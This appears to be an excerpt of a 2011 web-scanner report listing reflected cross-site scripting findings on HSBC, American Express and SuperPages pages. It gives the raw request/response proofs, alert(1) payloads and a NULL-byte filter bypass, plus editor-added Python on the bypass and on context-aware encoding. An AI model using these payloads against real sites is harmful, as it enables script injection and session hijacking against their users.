HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:39 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:39 GMT Vary: User-Agent,Cookie Set-Cookie: USIB2G=0000Dhol7ilZ0q0aTb173umEJKd:14k1jbteq; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=""; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/ Set-Cookie: SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; Expires=Tue, 02 Feb 2016 17:07:38 GMT; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Content-Length: 34486
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
The value of the code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f was submitted in the code parameter. This input was echoed as 41ec8"style="x:expression(alert(1))"fd17a07d03f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated closes the attribute value and injects a style attribute whose CSS expression() is dynamically evaluated, introducing arbitrary JavaScript into the document. Note that expression() is specific to Internet Explorer (and was dropped from IE8 standards mode onwards), so this particular payload does not fire in other browsers; the attribute injection itself is browser-independent, and the "><script> and "><img onerror> payloads used elsewhere in this report would work in the same position.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM000169941ec8"style%3d"x%3aexpression(alert(1))"fd17a07d03f&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:10 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:10 GMT Vary: User-Agent,Cookie Content-Length: 27260 Set-Cookie: USIB2G=0000NYkxlYtKgvFgWjsyZ7uTMLY:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7758e"%3balert(1)//c523249deae was submitted in the code parameter. This input was echoed as 7758e";alert(1)//c523249deae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM00016997758e"%3balert(1)//c523249deae&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:11 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:11 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000JbZ447P9hCR84of1XRxrbLB:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eae3f'%3balert(1)//f4fc58b391e was submitted in the code parameter. This input was echoed as eae3f';alert(1)//f4fc58b391e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1/2/3/hsbcpremier/prom/jan-11?code=CSM0001699eae3f'%3balert(1)//f4fc58b391e&WT.ac=HBUS_CSM0001699 HTTP/1.1 Host: www.us.hsbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: HSBC_COOKIEMI=af4a9330-2fae-11e0-9be0-000503030601; WT_FPC=id=173.193.214.243-1912428224.30131131:lv=1296770468348:ss=1296770438495; SCM_COOKIE=uid=0|val=m7e%2FaaZaQhL1C2gNe7%2BBLn4fyXiwQYH2hOH5Tfa0J9okxNOqmNMcbA%3D%3D; www.us.hsbc.com-VH=63510956.20992.0000; USIB2G=0000VARK-5IjNHt3QWqaQC_Ukrf:14k1jbteq;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:07:12 GMT Server: IBM_HTTP_Server Cache-Control: private Cache-Control: max-age=60 Expires: Thu, 03 Feb 2011 17:08:12 GMT Vary: User-Agent,Cookie Content-Length: 26880 Set-Cookie: USIB2G=0000bKlIRzRrrCPXuxZazS0H-Ki:14k1jbteq; Path=/ S: hbus-vh502_1 Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52396"%3balert(1)//a663c189a2b was submitted in the inav parameter. This input was echoed as 52396";alert(1)//a663c189a2b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?inav=footer_small_business_credit_cards52396"%3balert(1)//a663c189a2b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:24 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=a;Expires=Thu, 10-Feb-2011 14:15:24 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71911
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=footer_small_business_credit_cards52396";alert(1)//a663c189a2b"; </script> ...[SNIP]...
4.537. http://www201.americanexpress.com/business-credit-cards/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www201.americanexpress.com
Path: /business-credit-cards/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15a54"%3balert(1)//fd4c9d0046f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a54";alert(1)//fd4c9d0046f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?15a54"%3balert(1)//fd4c9d0046f=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "15a54";alert(1)//fd4c9d0046f=1"; </script> ...[SNIP]...
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. (The scanner names the parameter view-all-business-cards&inav because the valueless view-all-business-cards parameter preceding it in the query string was merged into the name; the echoed aj_queryString value below contains only the inav pair.) The payload 44aa5"%3balert(1)//7dd45ad0d89 was submitted in the inav parameter. This input was echoed as 44aa5";alert(1)//7dd45ad0d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/?view-all-business-cards&inav=menu_cards_sbc_viewallcards44aa5"%3balert(1)//7dd45ad0d89 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000OWl25Hw-p5p9o_dRR-NwERg:1115nbqmn; SaneID=173.193.214.243-1296742163652146;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:15:11 GMT Server: IBM_HTTP_Server Set-Cookie: homepage=b;Expires=Thu, 10-Feb-2011 14:15:11 GMT Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 71876
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <title>OPEN from Amer ...[SNIP]... <script type="text/javascript"> var aj_queryString = "inav=menu_cards_sbc_viewallcards44aa5";alert(1)//7dd45ad0d89"; </script> ...[SNIP]...
4.539. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www201.americanexpress.com
Path: /business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8efe8"%3balert(1)//d1240e2685e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8efe8";alert(1)//d1240e2685e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?8efe8"%3balert(1)//d1240e2685e=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
4.540. http://www201.americanexpress.com/business-credit-cards/business-credit-cards [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www201.americanexpress.com
Path: /business-credit-cards/business-credit-cards
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d7597"><script>alert(1)</script>c7d4c5b0106 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d7597"><script>alert(1)</script>c7d4c5b0106 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where C-style strings end at the first NULL byte: the filter inspects only the bytes before the %00 and finds nothing to block, while the application's length-counted strings carry the rest of the input through to the page. You should fix the actual vulnerability within the application code (encode output for the context it lands in, and reject control bytes in request parameters), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?%00d7597"><script>alert(1)</script>c7d4c5b0106=1 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cde0"%3balert(1)//2536ed24016 was submitted in the source parameter. This input was echoed as 3cde0";alert(1)//2536ed24016 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards3cde0"%3balert(1)//2536ed24016 HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d8dc2"><script>alert(1)</script>6a405ec230b was submitted in the source parameter. This input was echoed as d8dc2"><script>alert(1)</script>6a405ec230b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where C-style strings end at the first NULL byte: the filter inspects only the bytes before the %00 and finds nothing to block, while the application's length-counted strings carry the rest of the input through to the page. You should fix the actual vulnerability within the application code (encode output for the context it lands in, and reject control bytes in request parameters), and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /business-credit-cards/business-credit-cards?source=footer_small_business_credit_cards%00d8dc2"><script>alert(1)</script>6a405ec230b HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
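The remediation note for the two NULL-byte findings above states the mechanism in one sentence. The following Python example is added by the editor and is not code from this report, from Burp Suite or from the scanned application; it models the mechanism with the parameter from finding 4.540 (the source-parameter finding uses the same payload shape). The WAF rule, its blocked-token list, and the assumption that the application dropped the NUL but kept the bytes after it (which is what "echoed as" records) are constructed for the demonstration. The last check shows the input-side control the application itself should have had.

```python
from urllib.parse import unquote_to_bytes

# Parameter name taken from finding 4.540 above, used here as a constructed
# input. The leading %00 is the URL-encoded NUL byte; PLAIN_PARAM is the same
# payload without it, for comparison.
BYPASS_PARAM = '%00d7597"><script>alert(1)</script>c7d4c5b0106'
PLAIN_PARAM = 'd7597"><script>alert(1)</script>c7d4c5b0106'

# Assumed WAF signature list for the demo; real rule sets are far larger.
BLOCKED_TOKENS = (b"<script", b"onerror=", b"javascript:")


def c_string_view(raw):
    """What a strlen()/strstr()-based filter sees: the bytes up to the first NUL."""
    return raw.split(b"\x00", 1)[0]


def native_filter_blocks(raw):
    """Model of a WAF rule implemented over NUL-terminated C strings. It is
    correct for ordinary input and blind to everything after a 0x00 byte."""
    view = c_string_view(raw).lower()
    return any(tok in view for tok in BLOCKED_TOKENS)


def length_aware_filter_blocks(raw):
    """The same rule over a length-counted byte string, which is how the Java,
    PHP or Python application behind the WAF actually holds the parameter."""
    view = raw.lower()
    return any(tok in view for tok in BLOCKED_TOKENS)


def app_echo(raw):
    """Assumption matching the report's 'echoed as' text: the application kept
    the bytes after the NUL and dropped the NUL itself before writing them into
    the page. Stacks that keep the NUL as an ordinary character still deliver
    the markup after it to the browser."""
    return raw.replace(b"\x00", b"").decode("latin-1")


def reject_control_bytes(raw):
    """Boundary check the application should apply itself: a NUL or any other
    C0 control byte has no legitimate place in a query-string name or value and
    is a reliable signal of filter evasion."""
    return any(b < 0x20 for b in raw)


def analyse(param):
    """Decode one raw parameter the way a server would and report what each
    layer sees. Returns a dict so the outcomes can be compared side by side."""
    raw = unquote_to_bytes(param)
    return {
        "waf_native_blocks": native_filter_blocks(raw),
        "waf_length_aware_blocks": length_aware_filter_blocks(raw),
        "app_rejects_control_bytes": reject_control_bytes(raw),
        "reflected_markup": app_echo(raw),
    }


if __name__ == "__main__":
    for label, param in (("with %00", BYPASS_PARAM), ("without %00", PLAIN_PARAM)):
        print(label, analyse(param))
```

Running it shows the asymmetry the report relies on: with the %00 prefix the native-style filter passes the request and the application still reflects the full `"><script>` markup, while the same rule over a length-counted string, or a plain control-byte rejection, catches it. Neither filter is a substitute for encoding the value at the sink.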
The value of the sj_tabToOpen request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload de360%3balert(1)//2236b1cd6cb was submitted in the sj_tabToOpen parameter. This input was echoed as de360;alert(1)//2236b1cd6cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /getthecard/home?sj_tabToOpen=1de360%3balert(1)//2236b1cd6cb&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 14:08:19 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296742099505091; path=/; expires=Sun, 07-Feb-16 14:08:19 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oTYlMuvkOz4vp-E22WS5ugk:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <script src="htt ...[SNIP]... <script type="text/javascript"> var sj_responseText=""; var sj_rsvpStatus=""; var sj_offerURL=""; var sj_rsvpAttempts= 0; var sj_pageContext="Prospect"; var sj_tabToOpen = 1de360;alert(1)//2236b1cd6cb; var sj_modalToOpen = "null"; var sj_servername = "www201.americanexpress.com"; </script> ...[SNIP]...
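The remediation notes repeated through this report say to avoid echoing user data in a script context, but do not show what correct handling looks like for each of the contexts the findings identify: HTML text between tags and a double-quoted attribute (the superpages findings), a double- or single-quoted JavaScript string (the HSBC hp_pref and code findings and the American Express inav findings), and an unquoted JavaScript expression (sj_tabToOpen just above). The following Python example is added by the editor and is not code from this report or from any of the scanned sites. The reflected values are copied from the findings; the sink functions are modelled on the response snippets shown, and the `hp_pref` cookie line, the `sj_tabToOpen` assignment and the three-digit limit on the tab index are assumptions for the demonstration.

```python
import html
import json
import re

# Reflected values copied from the findings in this report, used here as
# constructed test inputs. Each key names the output context it broke out of.
PAYLOADS = {
    "html_text": "4500c<img src=a onerror=alert(1)>46b2d68491a",
    "attr_dq": '43ba5"><img src=a onerror=alert(1)>935e0c29137',
    "attr_style": 'afe63"style="x:expression(alert(1))"19a95eb25d7',
    "js_dq": '74bf5";alert(1)//00c0d1ff9',
    "js_sq": "eae3f';alert(1)//f4fc58b391e",
    "js_unquoted": "1de360;alert(1)//2236b1cd6cb",
}


def html_text(value):
    """Encoder for data placed between tags, e.g. inside <h1>...</h1>."""
    return html.escape(str(value), quote=False)


def html_attr(value):
    """Encoder for data inside a quoted attribute value, e.g. CONTENT="...".
    quote=True also turns " and ' into entities, so the value can neither close
    the attribute to add another (the style=expression case) nor open a tag."""
    return html.escape(str(value), quote=True)


def js_string_literal(value):
    """Emit a complete JavaScript string literal for use inside <script>.

    json.dumps supplies the quotes and backslash escapes, which covers both the
    double- and single-quoted findings as long as the whole literal is emitted
    (never splice the result between existing quotes). The extra replacements
    keep '</script>' and '<!--' in the data away from the HTML tokenizer, which
    ends the script block before the JS engine sees any escaping at all.
    """
    s = json.dumps(str(value))
    return s.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def tab_index(value, default=1):
    """An unquoted JS context (var sj_tabToOpen = <value>;) has no delimiter to
    escape, so encoding cannot help; only an allowlist of the expected type does.
    The 1-3 digit limit and the default of 1 are assumptions for this demo."""
    return int(value) if re.fullmatch(r"[0-9]{1,3}", value) else default


# Sinks modelled on the response snippets in the report. The vulnerable form
# concatenates the raw input; the hardened form routes it through the encoder
# that matches the context the data lands in.
def heading_vulnerable(category):
    return "<h1>Select a State to view " + category + " Listings </h1>"


def heading_hardened(category):
    return "<h1>Select a State to view " + html_text(category) + " Listings </h1>"


def meta_title_vulnerable(category):
    return '<META NAME="TITLE" CONTENT="' + category + ' in Yellow Pages by SuperPages">'


def meta_title_hardened(category):
    return '<META NAME="TITLE" CONTENT="' + html_attr(category) + ' in Yellow Pages by SuperPages">'


def cookie_script_vulnerable(pref):
    return 'document.cookie = "hp_pref"+"="+"' + pref + '"+expires+"; path=/";'


def cookie_script_hardened(pref):
    return 'document.cookie = "hp_pref="+' + js_string_literal(pref) + '+expires+"; path=/";'


def tab_script_vulnerable(value):
    return "var sj_tabToOpen = " + value + ";"


def tab_script_hardened(value):
    return "var sj_tabToOpen = " + str(tab_index(value)) + ";"


if __name__ == "__main__":
    pairs = [
        (heading_vulnerable, heading_hardened, PAYLOADS["html_text"]),
        (meta_title_vulnerable, meta_title_hardened, PAYLOADS["attr_style"]),
        (cookie_script_vulnerable, cookie_script_hardened, PAYLOADS["js_dq"]),
        (tab_script_vulnerable, tab_script_hardened, PAYLOADS["js_unquoted"]),
    ]
    for bad, good, payload in pairs:
        print("VULNERABLE:", bad(payload))
        print("HARDENED:  ", good(payload))
```

The design point is that the encoder is chosen by where the data lands, not by what the data looks like: the same `"` is harmless as `&quot;` in an attribute and as `\"` inside a JSON-style literal, and neither encoding helps in the unquoted sj_tabToOpen position, where only type validation does. Where the framework offers a templating engine with contextual auto-escaping, prefer it to hand-placed calls like these.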
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87daf"-alert(1)-"1a7bb763e07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile87daf"-alert(1)-"1a7bb763e07/css/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d043"-alert(1)-"ea78a66d4f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css6d043"-alert(1)-"ea78a66d4f3/busprofile.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14dd6"-alert(1)-"584c21ff5a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/css/busprofile.css14dd6"-alert(1)-"584c21ff5a6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46554"-alert(1)-"be25698ff9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile46554"-alert(1)-"be25698ff9/css/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6866"-alert(1)-"0f304c70d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /busprofile/cssb6866"-alert(1)-"0f304c70d9e/print.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
